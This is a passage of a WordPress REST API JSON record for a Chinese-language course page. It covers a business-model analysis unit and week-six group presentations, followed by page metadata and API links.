14pt;\">\u4e0b\u5468\u7b2c\u516d\u5468\u6bcf\u7d44\u4e0a\u53f0\u5206\u4eab\u6b64\u968e\u6bb5\u5206\u6790\u7d50\u679c\uff0c\u6bcf\u7d445\u5206\u9418<\/span><\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t","protected":false},"excerpt":{"rendered":"<p>\u8ab2\u524d\u6e96\u5099 \u9810\u7fd2\u5167\u5bb9 \u672c\u5468\u4e3b\u8981\u5b78\u7fd2\u904b\u7528\u5546\u696d\u6a21\u5f0f\u5206\u6790\u6cd5\uff0c\u7530\u91ce\u8abf\u67e5\u4e86\u89e3\u76ee\u524d\u5e02\u5834\u72c0\u6cc1\uff0c\u4e26<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":853,"menu_order":5,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0},"_links":{"self":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/871"}],"collection":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=871"}],"version-history":[{"count":7,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/871\/revisions"}],"predecessor-version":[{"id":1521,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/871\/revisions\/1521"}],"up":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/853"}],"wp:attachment":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=871"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}